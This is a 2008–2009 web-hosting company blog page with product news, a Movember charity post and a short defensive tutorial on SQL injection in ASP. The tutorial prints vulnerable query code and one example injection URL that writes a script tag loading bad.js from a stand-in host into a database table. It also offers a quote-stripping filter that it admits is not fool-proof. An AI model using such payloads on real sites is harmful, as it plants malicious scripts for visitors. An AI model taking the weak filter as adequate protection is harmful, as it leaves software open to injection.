100% Australian Windows Web Hosting

Blog

Categories

1 10 11 12 13 14

What’s happening at StudioCoast

Published March 17, 2009 | By admin

Hi there!

It's been a while since I last posted a Blog entry so I thought I would mention a few new things we have been rolling out:

  1. NEW Domain Name Registration system

    We've finished implementing a custom built Domain Registration system that allows management of both domains and web hosting from a single account.
    If you have a Domain Name registered with us, visit https://secure.hostcontrol.com.au/order/login.aspx and put your domain name into the Password Recovery section to receive instructions on how to include it in your existing Web Hosting account.

  2. ASP.NET 3.5 Web Hosting on IIS 7.0 (with SP1)

    This has been available for a while now but I thought I would mention it as customers can now request their sites be moved over to IIS 7.0 if they would like to try out the new features.
    If you would like to purchase a new Web Hosting account you can do so here:

    ASP.NET 3.5 Web Hosting

    During the order process you will be given the opportunity to request IIS 7.0 as all existing Web Hosting plans support it.

  3. Improved hostControl

    We've updated the interface to make it even easier to use and added a couple of features customers have requested:

    Default Documents – You can specify the home page for your web site and change the order pages are loaded here.
    Domain Registration – As mentioned above, this new feature allows you to change name servers, update contact details and process renewals for your domain names.

 So there you have it! We are always interested in hearing your feedback, so if you have something to say send us an email or visit the Support page on our web site:

http://www.studiocoast.com.au/

 

Movember is here!

Published November 2, 2008 | By admin

You know those normally hygienic people who for some strange reason decide to throw it out the window once a year and grow a hideous moustache?
Well believe it or not they haven't gone mad, they are supporting Movember which aims to raise funds and awareness for men's health.

This month my staff are on the ball, setting up a campaign where 5% of every Web Hosting or HyperVPS account purchased in the month of November will go straight to the Movember Foundation.
That money will then go on to either the Prostate Cancer Foundation of Australia or beyondblue: the national depression initiative. Two worthy causes I think you'll agree.

For full details you can visit our Movember website or head on over to the offical web site for all the details.

Battling SQL Injection

Published September 5, 2008 | By admin

"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?

SQL injection involves manipulating the variables sent to a web page in order to place additional SQL queries within queries used as part of the web site code.

There are a multitude of ways SQL Injection can be used for nefarious purposes but today we are going to look at the most common method at the moment being used to insert malicious javascript files into web sites

Take the following simple example using ASP:

testpage.asp 

<%

  szQuery = "Select * From myTable Where ID = " & Request("ID")

  

%>  

Because the Request("ID") variable isn't filtered or checked in any way, an attacker can manipulate the URL request string to insert any commands they like into the table.

So if they have a script at say http://testdomain.local/bad.js and the myTable has a column called "Description" which is used to display information on the page, an attacker could use the following:

 

"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1"

This will update the record with ID = 1 to insert the javascript into the description field.

THIS IS BAD

So how does one fix it?

The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.

In ASP.NET however, the problem can be solved by using the SQLCommand.Parameters to add each variable that is needed in the query.

Then the SQL Query will look something like this:

Select * From myTable Where ID = @ID;

But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable approach.
(Though not completely fool proof)

<%

  szID = Request("ID")
szID = Replace(szID,"'","")
szID = Replace(szID,";","")

szQuery = "Select * From myTable Where ID = '" & szID  & "'"

%> 

The above will "escape" potentially dangerous characters such as ' and ; from the variable completely.

Note that the above is only helpful if the ID variable is a string. 

If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:

<%

  iID = CINT(Request("ID"))

szQuery = "Select * From myTable Where ID = " & iID 

  … 

%> 

In the above example, if an attacker tries to insert something into ID, it will cause an error and refuse to run the query.

So there you have it, SQL Injection is easy to avoid once you know how.

 

 

1 10 11 12 13 14
Copyright © 2002 - 2015 StudioCoast Pty Ltd   |   ABN: 53 143 039 070